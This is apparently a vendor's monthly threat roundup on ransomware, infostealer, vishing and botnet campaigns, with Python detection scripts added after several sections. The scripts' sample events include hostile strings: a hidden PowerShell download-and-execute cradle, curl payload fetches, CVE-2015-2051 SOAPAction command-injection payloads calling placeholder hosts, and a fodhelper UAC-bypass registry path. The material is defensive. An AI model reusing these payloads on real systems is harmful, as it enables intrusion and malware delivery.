The overall level of cyber threat remains elevated globally, and the impact is being felt across organizations of all sizes and industry sectors. Attacks persist across every sector, with continued global focus on healthcare and industrial control systems (ICS). This continues the trend of attackers seeking 'soft' targets in industries with a history of underinvestment in cybersecurity, and the impact of each attack is growing as malicious actors concentrate on higher-value targets.
The current unrest in the Middle East is creating a surge in attacks centered on or originating from that region. One recent malware campaign targets Discord users through emojis posted on the platform: DISGOMOJI, a Discord-based command-and-control (C2) program written in Go, establishes persistent access on the target system, after which the operator controls the implant by sending emojis in a Discord channel. Those emoji commands drive a range of actions, from taking screenshots to exfiltrating data.
Below are the top five threats that have emerged over the past month.
Knight Ransomware Rebranded
RansomHub, a ransomware-as-a-service (RaaS) operation, has been implicated in multiple attacks on major organizations across a range of industries, including Change Healthcare, adding to the growing offensive aimed at healthcare institutions. Recent analysis indicates that RansomHub is likely a rebranding of the "Knight" ransomware (formerly Cyclops), whose operators shut down in late February of this year. This kind of rapid repositioning and relaunch shortly after exposure and takedown has become increasingly common, as RaaS operations are built on reusable code and affiliate infrastructure that can be spun up again under a new name.
- The parallels between RansomHub and Knight are too numerous to plausibly deny a common origin
- Both are written in Go and obfuscated with Gobfuscate
- Identical command-line help menus (RansomHub adds a "sleep" option)
- Identical ransom notes
- Both restart the host in Safe Mode before beginning encryption
The family was responsible for at least 26 attacks in April alone and shows no sign of slowing down: its operators appear to be recruiting affiliates of recently disrupted groups such as LockBit and BlackCat. This recruitment appears to have worked, as at least one former BlackCat affiliate is known to have migrated, and that affiliate's tooling has since been observed in RansomHub attacks. Based on how quickly the operation was spun up and how prevalent it became, researchers assess that the people behind it are experienced, well-connected cybercriminals.
Ransomware activity overall rose in 2023 after a dip in 2022. Trends such as rapid pivoting and rebranding after a takedown, and growing collaboration between threat groups, suggest that this type of malware will continue to proliferate through 2024. The majority of attacks are launched outside of business hours, and ransomware is typically deployed within 48 hours of initial access. This highlights the importance of proactive, 24/7 monitoring and response, especially in the increasingly targeted healthcare industry, where a successful ransomware attack can cause physical harm and loss of life.
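The Safe Mode step in the list above is the most detectable part of the pre-encryption sequence: a host does not normally arm itself for a Safe Mode boot and then reboot at 10 pm. The Python below is an added example, not code from the Symantec analysis or from either ransomware family; the article does not show the exact commands Knight and RansomHub issue, so the example assumes the standard Windows way of doing it (bcdedit /set ... safeboot followed by shutdown /r). The event lines, host names and users are constructed to look like flattened Sysmon Event ID 1 / Security 4688 records.

```python
"""Flag the 'arm Safe Mode, then reboot' staging step that precedes encryption."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Process-creation events (Sysmon Event ID 1 / Security 4688 style) flattened
# to one line each. Constructed for this example; not real telemetry.
SAMPLE_EVENTS = [
    "2024-05-03T22:14:07 host=WS-17 user=CORP\\admin image=C:\\Windows\\System32\\bcdedit.exe cmd=bcdedit /set {default} safeboot network",
    "2024-05-03T22:14:09 host=WS-17 user=CORP\\admin image=C:\\Windows\\System32\\shutdown.exe cmd=shutdown /r /f /t 0",
    "2024-05-04T01:02:11 host=SRV-DB01 user=CORP\\svc_backup image=C:\\Windows\\System32\\bcdedit.exe cmd=bcdedit /set {current} safeboot minimal",
    "2024-05-04T09:30:00 host=WS-22 user=CORP\\jdoe image=C:\\Windows\\System32\\bcdedit.exe cmd=bcdedit /deletevalue {default} safeboot",
    "2024-05-04T09:31:00 host=WS-22 user=CORP\\jdoe image=C:\\Windows\\System32\\bcdedit.exe cmd=bcdedit /enum",
    "2024-05-04T17:45:00 host=WS-09 user=CORP\\it_ops image=C:\\Windows\\System32\\shutdown.exe cmd=shutdown /r /t 0",
]

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) image=(?P<image>\S+) cmd=(?P<cmd>.*)$"
)
# bcdedit ... /set ... safeboot {minimal|network}: arms the next boot for Safe Mode.
SAFEBOOT_SET = re.compile(r"\bbcdedit(?:\.exe)?\b.*?/set\b.*\bsafeboot\b", re.IGNORECASE)
# shutdown /r (or -r): the reboot that makes the armed Safe Mode take effect.
REBOOT = re.compile(r"\bshutdown(?:\.exe)?\b.*?[/-]r\b", re.IGNORECASE)
REBOOT_WINDOW = timedelta(minutes=10)


def parse_event(line):
    """Turn one flattened event line into a dict; None if it does not match."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev


def find_safe_mode_staging(lines, window=REBOOT_WINDOW):
    """One alert per bcdedit call that arms Safe Mode.

    Severity is HIGH when the same host reboots within `window` afterwards
    (the pattern a ransomware deployer produces) and MEDIUM when it does not
    (possibly an administrator preparing maintenance; still worth a look).
    """
    by_host = defaultdict(list)
    for ev in filter(None, map(parse_event, lines)):
        by_host[ev["host"]].append(ev)

    alerts = []
    for host, events in by_host.items():
        events.sort(key=lambda e: e["ts"])
        for i, ev in enumerate(events):
            if not SAFEBOOT_SET.search(ev["cmd"]):
                continue
            rebooted = any(
                REBOOT.search(later["cmd"]) and later["ts"] - ev["ts"] <= window
                for later in events[i + 1:]
            )
            alerts.append({
                "host": host, "user": ev["user"], "ts": ev["ts"], "cmd": ev["cmd"],
                "severity": "HIGH" if rebooted else "MEDIUM",
            })
    return alerts


if __name__ == "__main__":
    for a in find_safe_mode_staging(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['ts']} {a['host']} {a['user']}: {a['cmd']}")
```

On the sample data WS-17 is rated HIGH (armed and rebooted within two seconds) and SRV-DB01 MEDIUM (armed, no reboot seen), while the bcdedit /deletevalue cleanup on WS-22 and the plain reboot on WS-09 are ignored. The cleanup call is itself a useful secondary signal, since a deployer that booted into Safe Mode usually removes the safeboot value afterwards; administrators rarely do this outside a change window.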
APT CoralRaider
Cisco Talos uncovered an ongoing campaign by the threat actor CoralRaider, active since at least February 2024, that distributes three well-known infostealers: Cryptbot, LummaC2, and Rhadamanthys. The actor uses several tactics to evade detection, including embedding PowerShell commands in Windows shortcut (LNK) files to slip past antivirus software and using Content Delivery Network (CDN) cache domains as download servers for malicious payloads.
Victims in multiple countries, including the U.S., Nigeria, and Pakistan, have been affected. The campaign reaches victims through phishing emails containing malicious links. The infection chain starts when the victim opens the malicious LNK file, which runs a series of PowerShell scripts that download and execute the payload, ultimately installing one of the three infostealers.
The PowerShell scripts appear to be custom-written rather than taken from public tooling, which points to a capable operator. The attacker also uses fodhelper.exe, an auto-elevating Windows binary, to bypass User Account Control (UAC): by writing a command into a registry key that fodhelper.exe consults when it launches, the actor gets that command executed with elevated privileges without any consent prompt being shown to the user.
Each of the three infostealers has its own features and capabilities, all aimed at stealing sensitive information from infected machines: system data, browser data, credentials, and cryptocurrency wallets. The variants keep evolving to avoid detection, using techniques such as obfuscation and payload encryption.
The threat actor operates multiple command-and-control (C2) domains and custom loaders to deploy and manage the malware, showing a deliberate effort to maintain persistence and evade security controls. The campaign's scale and sophistication suggest a well-organized cybercriminal operation targeting a wide range of organizations and individuals globally.
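Two steps of the chain just described leave telemetry that is easy to match on: the shortcut file launching PowerShell with window-hiding or encoding switches, and the fodhelper.exe bypass, which works by writing a command under the per-user ms-settings protocol handler key (HKCU\Software\Classes\ms-settings\Shell\Open\command, usually together with an empty DelegateExecute value) so that the auto-elevated fodhelper.exe runs it. The Python below is an added example, not Talos's detection logic or CoralRaider's code. The events are constructed in a Sysmon-like process-creation / registry-set shape, and the host names, paths and the cdn-cache.example.invalid domain are placeholders.

```python
"""Spot the CoralRaider-style chain: hidden PowerShell from a shortcut, then a fodhelper.exe UAC bypass."""
import ntpath
import re

# One line per event: Sysmon-style process creation (type=process) and
# registry value set (type=registry). Constructed for this example.
SAMPLE_EVENTS = [
    "type=process ts=2024-04-10T14:02:11 host=WS-41 parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmd=powershell.exe -w hidden -ep bypass -c \"iex (irm https://cdn-cache.example.invalid/s.ps1)\"",
    "type=registry ts=2024-04-10T14:02:13 host=WS-41 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe target=HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command value=DelegateExecute",
    "type=process ts=2024-04-10T14:02:14 host=WS-41 parent=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe image=C:\\Windows\\System32\\fodhelper.exe cmd=fodhelper.exe",
    "type=process ts=2024-04-10T14:02:15 host=WS-41 parent=C:\\Windows\\System32\\fodhelper.exe image=C:\\Windows\\System32\\cmd.exe cmd=cmd.exe /c C:\\Users\\Public\\stage2.bat",
    "type=process ts=2024-04-10T15:10:00 host=WS-07 parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmd=powershell.exe",
    "type=registry ts=2024-04-10T15:11:00 host=WS-07 image=C:\\Windows\\System32\\svchost.exe target=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run value=SecurityHealth",
]

# Switches a shortcut lure uses to run PowerShell silently.
HIDDEN_PS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|e(?:nc|ncodedcommand)?\s|e(?:p|xecutionpolicy)\s+bypass)",
    re.IGNORECASE,
)
# Per-user ms-settings: handler. fodhelper.exe (auto-elevating) looks this up,
# so a command written here runs elevated without a UAC prompt.
FODHELPER_KEY = re.compile(r"\\Classes\\ms-settings\\Shell\\Open\\command$", re.IGNORECASE)
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "rundll32.exe", "wscript.exe", "cscript.exe"}


def parse_event(line):
    """key=value fields, with the free-form command line kept whole after ' cmd='."""
    head, _, cmd = line.partition(" cmd=")
    ev = dict(field.split("=", 1) for field in head.split())
    ev["cmd"] = cmd
    return ev


def _base(path):
    return ntpath.basename(path).lower()


def check_event(ev):
    """Return (rule, description) pairs that fire on one event."""
    hits = []
    if ev["type"] == "process":
        image, parent = _base(ev["image"]), _base(ev.get("parent", ""))
        if parent == "explorer.exe" and image in {"powershell.exe", "pwsh.exe"} and HIDDEN_PS.search(ev["cmd"]):
            hits.append(("R1", "hidden/encoded PowerShell launched from Explorer (shortcut-file lure)"))
        if parent == "fodhelper.exe" and image in SCRIPT_HOSTS:
            hits.append(("R3", "fodhelper.exe spawned a script host: UAC bypass fired"))
    elif ev["type"] == "registry" and FODHELPER_KEY.search(ev["target"]):
        hits.append(("R2", "ms-settings handler hijack staged for fodhelper.exe UAC bypass"))
    return hits


def scan(lines):
    return [(ev["host"], ev["ts"], rule, why) for ev in map(parse_event, lines) for rule, why in check_event(ev)]


if __name__ == "__main__":
    for host, ts, rule, why in scan(SAMPLE_EVENTS):
        print(f"{ts} {host} {rule}: {why}")
```

R2 is the highest-confidence rule: there is no legitimate reason for that key to exist under HKCU, so any write to it can be blocked outright (or the key pre-created with restrictive permissions). R1 needs tuning where users launch hidden scripts from shortcuts on purpose; R3 closes the loop by catching the bypass at the moment it succeeds, which also covers variants that stage the key by a route R2 does not see.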
Quick Assist Social Engineering for Ransomware Deployment
Since mid-April 2024, the Windows remote-assistance tool Quick Assist has been abused by the threat actor Storm-1811 in social engineering attacks against end users. The group's primary payload is Black Basta ransomware, profiled in a previous article. A worrying development in this campaign is the use of voice phishing ("vishing") to talk victims into granting remote access, after which the actor deploys legitimate remote monitoring and management (RMM) tools such as ScreenConnect and NetSupport Manager, or malware such as Qakbot, Cobalt Strike, and ultimately Black Basta.
Quick Assist lets a user share their device with someone else over a remote connection, including full mouse and keyboard control. It is widely used for legitimate IT support, which is exactly what makes it attractive to abuse, as in this case. In one pattern, the attacker first floods the user's mailbox by subscribing the address to many mailing lists, then calls the user impersonating IT or help-desk staff and offers to fix the spam. The attacker only has to convince the user to open Quick Assist (Ctrl+Windows+Q) and enter the security code the caller supplies.
Once the victim grants control, the actor runs a scripted cURL command that downloads a series of batch (.bat) and ZIP files containing the payloads. Some of the scripts pose as spam-filter installers and prompt the user to enter their sign-in credentials. This stage typically leads to the installation of Qakbot, Cobalt Strike, and ScreenConnect or NetSupport Manager for added persistence.
Qakbot and Cobalt Strike, as covered previously, have long been used as a beachhead on compromised machines to facilitate further malware delivery and access. Black Basta, the primary payload, is a closed ransomware operation whose operators often buy this initial access from other threat actors.
Once again, the end user is the easiest and most critical defense to bypass. Given the rise of AI voice-generation tools and their growing effectiveness, voice-based social engineering is an increasingly accessible avenue for attackers of all sizes and skill levels. Because public awareness of this technique will likely lag behind the sophistication of voice spoofing, it is a serious concern on the social-engineering front, which remains arguably the most important in cybersecurity.
Proper training is more critical than ever, not only on phishing emails but also on newer techniques that remove once easy-to-spot red flags. Blocking or uninstalling Quick Assist is an easy way to close at least this vector, provided your organization has another tool for remote IT support.
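Because the attacker is typing into a session the user opened, the cURL download and the batch-file execution look like ordinary user activity in isolation. What makes them high-signal is the sequence: a Quick Assist session starts, curl.exe writes a script or archive within the next hour, and that file is then executed on the same host. The Python below is an added example that correlates exactly those three events; it is not Microsoft's detection logic or anything from the original article. The event lines, host names and paths are constructed, 198.51.100.10 is a documentation address standing in for the actor's server, and the QuickAssist.exe path assumes the Store app's execution alias under the user's WindowsApps folder.

```python
"""Correlate a Quick Assist session with cURL-fetched scripts that are then executed."""
import ntpath
import re
from datetime import datetime, timedelta

# Process-creation events, one per line; constructed for this example.
SAMPLE_EVENTS = [
    "ts=2024-05-02T10:00:00 host=WS-12 user=CORP\\mlee image=C:\\Users\\mlee\\AppData\\Local\\Microsoft\\WindowsApps\\QuickAssist.exe cmd=QuickAssist.exe",
    "ts=2024-05-02T10:03:10 host=WS-12 user=CORP\\mlee image=C:\\Windows\\System32\\curl.exe cmd=curl -s -o C:\\Users\\Public\\update.zip http://198.51.100.10/p/update.zip",
    "ts=2024-05-02T10:03:12 host=WS-12 user=CORP\\mlee image=C:\\Windows\\System32\\curl.exe cmd=curl -o C:\\Users\\Public\\run.bat http://198.51.100.10/p/run.bat",
    "ts=2024-05-02T10:03:40 host=WS-12 user=CORP\\mlee image=C:\\Windows\\System32\\cmd.exe cmd=cmd.exe /c C:\\Users\\Public\\run.bat",
    "ts=2024-05-02T11:30:00 host=WS-30 user=CORP\\tgarcia image=C:\\Windows\\System32\\curl.exe cmd=curl -o C:\\Temp\\fix.bat https://files.example.invalid/fix.bat",
    "ts=2024-05-02T11:31:00 host=WS-30 user=CORP\\tgarcia image=C:\\Windows\\System32\\cmd.exe cmd=cmd.exe /c C:\\Temp\\fix.bat",
    "ts=2024-05-02T12:00:00 host=WS-30 user=CORP\\tgarcia image=C:\\Windows\\System32\\curl.exe cmd=curl -o C:\\Temp\\report.pdf https://files.example.invalid/report.pdf",
]

QA_WINDOW = timedelta(hours=1)
# curl's output-file switch; the path is what we later look for on a command line.
OUTPUT_OPT = re.compile(r'(?:^|\s)(?:-o|--output)\s+"?([^"\s]+)', re.IGNORECASE)
STAGED_EXT = (".bat", ".cmd", ".ps1", ".vbs", ".zip")


def parse_event(line):
    head, _, cmd = line.partition(" cmd=")
    ev = dict(field.split("=", 1) for field in head.split())
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    ev["cmd"] = cmd
    return ev


def correlate(lines, window=QA_WINDOW):
    """Alert when a script fetched with cURL is later executed on the same host.

    Severity is HIGH if the download happened within `window` after a Quick Assist
    session started on that host, MEDIUM otherwise.
    """
    qa_started = {}   # host -> time QuickAssist.exe last started
    staged = {}       # (host, lowercase path) -> (download time, during_quick_assist)
    alerts = []
    for ev in map(parse_event, lines):
        host, ts, image = ev["host"], ev["ts"], ntpath.basename(ev["image"]).lower()
        if image == "quickassist.exe":
            qa_started[host] = ts
            continue
        if image == "curl.exe":
            m = OUTPUT_OPT.search(ev["cmd"])
            if m and m.group(1).lower().endswith(STAGED_EXT):
                during_qa = host in qa_started and timedelta(0) <= ts - qa_started[host] <= window
                staged[(host, m.group(1).lower())] = (ts, during_qa)
            continue
        cmd = ev["cmd"].lower()
        for (h, path), (dl_ts, during_qa) in staged.items():
            if h == host and path in cmd:
                alerts.append({
                    "host": host, "user": ev["user"], "path": path,
                    "downloaded": dl_ts, "executed": ts,
                    "severity": "HIGH" if during_qa else "MEDIUM",
                })
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['host']} {a['user']} ran {a['path']} "
              f"fetched at {a['downloaded']:%H:%M:%S}")
```

On the sample, WS-12 (download and execution minutes after Quick Assist started) is rated HIGH and WS-30 (same pattern, no Quick Assist session) MEDIUM; the PDF download and the never-executed update.zip produce nothing. Administrators do use curl.exe, so the MEDIUM tier is for review rather than automatic response; if your environment has replaced Quick Assist with another remote-support product, the same correlation works with that product's executable name.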
Goldoon Botnet Targets 10-Year-Old Vulnerability
In April 2024, FortiGuard Labs identified a new botnet named "Goldoon" that exploits an old D-Link vulnerability, CVE-2015-2051, which allows remote attackers to run arbitrary commands on affected devices via a crafted HTTP request. The discovery is significant precisely because the flaw was disclosed in 2015: plenty of unpatched devices are still exposed, so the bot can still spread through an environment.
Infection begins with exploitation of CVE-2015-2051 to fetch a dropper from a specific URL. The dropper then downloads and executes payloads built for a range of Linux architectures, including aarch64, arm, i686, mips64, and others. After execution the dropper deletes itself from disk to remove traces of its presence, a deliberate step to evade detection.
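The "crafted HTTP request" above is, in the public write-ups of CVE-2015-2051, a command injection through the SOAPAction header of the router's HNAP1 interface: the header is supposed to carry the HNAP namespace plus one action name, and anything appended after the action name is passed to a shell. That makes the check simple if you do it as positive validation rather than signature matching. The Python below is an added example of such a check for a reverse proxy, IDS tap or log parser in front of the device; it is not Fortinet's detection and not code from the botnet. The requests are constructed, and 192.0.2.1 / 198.51.100.7 are documentation addresses.

```python
"""Positive-validation check for HNAP SOAPAction headers (CVE-2015-2051 style command injection)."""
import re

# Raw HTTP requests as a proxy or IDS tap would capture them. Constructed for this example.
SAMPLE_REQUESTS = [
    # 0: benign HNAP call a management client makes
    "GET /HNAP1/ HTTP/1.1\r\nHost: 192.0.2.1\r\nSOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings\"\r\n\r\n",
    # 1: backtick injection that fetches and runs a dropper
    "POST /HNAP1/ HTTP/1.1\r\nHost: 192.0.2.1\r\nSOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp; wget http://198.51.100.7/d.sh; sh d.sh`\"\r\nContent-Length: 0\r\n\r\n",
    # 2: unrelated request
    "GET /index.html HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
    # 3: $(...) variant of the same injection
    "POST /HNAP1/ HTTP/1.1\r\nHost: 192.0.2.1\r\nSOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings/$(busybox wget -O /tmp/x 198.51.100.7/x)\"\r\n\r\n",
    # 4: off-spec header without shell syntax (probing, or a buggy client)
    "POST /HNAP1/ HTTP/1.1\r\nHost: 192.0.2.1\r\nSOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings/../Login\"\r\n\r\n",
]

# What a legitimate SOAPAction looks like: the HNAP namespace plus one action name.
VALID_SOAPACTION = re.compile(r'^"?http://purenetworks\.com/HNAP1/[A-Za-z0-9_]+"?$')
# Shell syntax or download tooling inside the header means someone is injecting a command.
SHELL_SYNTAX = re.compile(r"[`$;|&<>]|\b(?:wget|curl|tftp|busybox|nc|sh)\b")


def parse_request(raw):
    """Minimal HTTP/1.1 request parser: method, target, lower-cased header map, body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def classify(req):
    """None for benign traffic, else a verdict for an abnormal HNAP request."""
    if not req["target"].startswith("/HNAP1"):
        return None
    action = req["headers"].get("soapaction")
    if action is None or VALID_SOAPACTION.match(action):
        return None
    if SHELL_SYNTAX.search(action):
        injected = action.split("/HNAP1/", 1)[-1].strip('"')
        return {"verdict": "command-injection", "payload": injected}
    return {"verdict": "malformed-soapaction", "payload": action}


def scan(raw_requests):
    results = []
    for i, raw in enumerate(raw_requests):
        finding = classify(parse_request(raw))
        if finding:
            results.append((i, finding["verdict"], finding["payload"]))
    return results


if __name__ == "__main__":
    for idx, verdict, payload in scan(SAMPLE_REQUESTS):
        print(f"request #{idx}: {verdict}: {payload}")
```

The allow-list regex does the real work: any SOAPAction that is not "namespace plus one action name" is rejected, and the shell-syntax pattern only decides how loudly to alert and what to extract for the analyst (the injected command, which in the Goldoon case is the dropper download). Blocking on the allow-list rather than on the shell pattern means an encoding trick that evades the second regex still never reaches the device; for an end-of-life router that will never receive a firmware fix, putting this in front of the HNAP interface, or disabling HNAP entirely, is the realistic mitigation.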
Goldoon's payloads exhibit various behaviors, including initializing arguments necessary for attacks, setting autorun methods for persistence, establishing a persistent connection to a Command and Control (C2) server, and waiting for commands to initiate attacks, particularly distributed denial-of-service (DDoS) attacks. The malware also uses traffic encryption and reliable DNS resolvers, such as Google's, to successfully carry out its malicious objectives.
The autorun methods of Goldoon are diverse and aimed at ensuring that the malware is executed upon system startup or user login. These methods include modifying Linux boot initialization files or setting up as a daemon.
FortiGuard Labs' analysis showed that Goldoon supports an extensive range of attack methods, 27 in total, including TCP SYN flooding. The botnet is still under development, which indicates that its authors intend to expand an already large arsenal of attack techniques.
Despite the age of CVE-2015-2051, its renewed exploitation by Goldoon in 2024 underlines the ever-present risk posed by botnets and the critical need to apply security patches consistently, and to retire devices that no longer receive them. FortiGuard Labs' insight into Goldoon is a stern reminder of how botnets evolve and exploit known vulnerabilities to compromise devices and launch further attacks, and of the importance of staying vigilant and keeping security measures up to date against persistent, adaptive threats.
Large-Scale SOHO Router Attack
In late October 2023, a significant cyber incident was uncovered involving over 600,000 small office/home office (SOHO) routers connected to a single internet service provider (ISP). The attack, spanning from October 25 to October 27, rendered these devices permanently inoperable, necessitating hardware replacements. Public scan data corroborated this, showing a dramatic 49% reduction in the ISP's device count during this period.
The primary culprit behind this destructive event was identified as the "Chalubo" remote access trojan (RAT). Initially detected in 2018, Chalubo evades detection by removing its files from disk and running in memory, and it encrypts all communication with its command-and-control (C2) server. Despite being widespread, these techniques have kept its visibility in security reporting low. The malware has various functions, including launching DDoS attacks and executing Lua scripts, which were likely used to deploy the destructive payload in this attack.
Technically, the attack began with Chalubo exploiting vulnerabilities or weak credentials in the SOHO routers. Once initial access was gained, the malware retrieved and executed a series of bash scripts from a first-stage payload server. These scripts downloaded and executed the Chalubo trojan, which used ChaCha20 encryption to secure its communication with the C2 servers. The malware deleted itself from disk after execution, renamed its processes to avoid detection, and adjusted system settings so it would not be terminated under memory pressure. Its ability to execute arbitrary Lua scripts let it receive and run further commands from the attackers, including the destructive payload that rendered the routers inoperable.
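Both the Goldoon dropper described earlier and Chalubo here rely on the same trick: delete the binary from disk once it is running, and (in Chalubo's case) rename the process so it blends in. On Linux that leaves a fingerprint the kernel reports for free: /proc/<pid>/exe for such a process resolves to a path ending in " (deleted)" (or a memfd: pseudo-path), and the process name in /proc/<pid>/comm no longer matches the binary. The Python below is an added example of a triage scan on that fingerprint, not code from Lumen's or Fortinet's analysis; the snapshot it runs against is constructed, and the live collector assumes a Linux host where /proc is readable (root to see every process's exe link).

```python
"""Find running processes whose on-disk binary is gone or whose name does not match it."""
import os
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    exe: str    # readlink(/proc/<pid>/exe); "" when unreadable (kernel threads, no permission)
    comm: str   # /proc/<pid>/comm, the name the process reports (attackers can rewrite it)


# A constructed snapshot standing in for a scan of a live router or Linux host.
SAMPLE_SNAPSHOT = [
    Proc(1, "/usr/lib/systemd/systemd", "systemd"),
    Proc(4, "", "kworker/0:0"),                                  # kernel thread: nothing to check
    Proc(812, "/usr/sbin/sshd", "sshd"),
    Proc(2231, "/tmp/.x/lua_loader (deleted)", "kworker/0:1"),  # unlinked itself, poses as a kernel thread
    Proc(2250, "/memfd:kw (deleted)", "httpd"),                 # fileless, loaded through memfd
    Proc(3001, "/usr/bin/python3.11", "python3"),               # benign: comm is a truncation
]

EPHEMERAL = ("/tmp/", "/var/tmp/", "/dev/shm/", "/memfd:")


def collect_procs():
    """Snapshot the live process table from /proc (Linux only)."""
    procs = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            exe = ""
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
        except OSError:
            continue                      # process exited between listdir and open
        procs.append(Proc(pid, exe, comm))
    return procs


def reasons_for(p):
    """Why this process looks like an in-memory implant; empty list when it looks normal."""
    if not p.exe:
        return []
    reasons = []
    if p.exe.endswith(" (deleted)"):
        reasons.append("binary removed from disk while still running")
    if p.exe.startswith(EPHEMERAL):
        reasons.append("executing from a writable or memory-only location")
    exe_base = os.path.basename(p.exe.removesuffix(" (deleted)"))
    # comm is at most 15 characters, so a legitimate name may be a prefix of the real one.
    if not (exe_base.startswith(p.comm) or p.comm.startswith(exe_base[:15])):
        reasons.append(f"process name {p.comm!r} does not match binary {exe_base!r}")
    return reasons


def suspicious(procs):
    return [(p.pid, reasons_for(p)) for p in procs if reasons_for(p)]


if __name__ == "__main__":
    for pid, why in suspicious(collect_procs()):
        print(pid, "; ".join(why))
```

Treat the output as triage, not conviction: a long-running daemon also shows " (deleted)" after a package upgrade replaced its binary, and interpreters report a truncated name. The combination the sample flags (deleted, in a temporary or memory-only location, and masquerading as a kernel thread or unrelated service) is what matters. Consumer routers will not have Python, but the same three checks are a short busybox shell loop over /proc, which is the form this would take on the devices in the incident above.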
Many affected areas were rural or underserved communities, leading to disruptions in emergency services, agricultural monitoring, and healthcare access. This incident highlights the vulnerability of essential services to cyber threats and the significant recovery challenges faced by isolated or vulnerable communities.
An investigation into the attack revealed that the Chalubo malware family was highly active in late 2023 and early 2024. The global telemetry data showed over 330,000 unique IP addresses communicating with Chalubo's command and control servers, indicating widespread infections. This attack stands out not only for its scale but also for the strategic use of malware to obscure the identity of the attackers, who remain unattributed. The findings underscore the need for robust cybersecurity measures and collaboration within the security community to mitigate such threats.
The global cyber threat level has continued to rise, driven by broader geopolitical unrest around the Middle East, Ukraine, and China-Taiwan. The number of cybersecurity incidents continues to climb and their impact continues to grow. Organizations of all sizes and in all sectors need to increase their awareness of both the overall threat environment and the threats specifically relevant to their organization or industry. Threat hunting, offered as part of Marcum Technology's Managed Security Services, can help provide this visibility by identifying potential risks to an organization.
The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.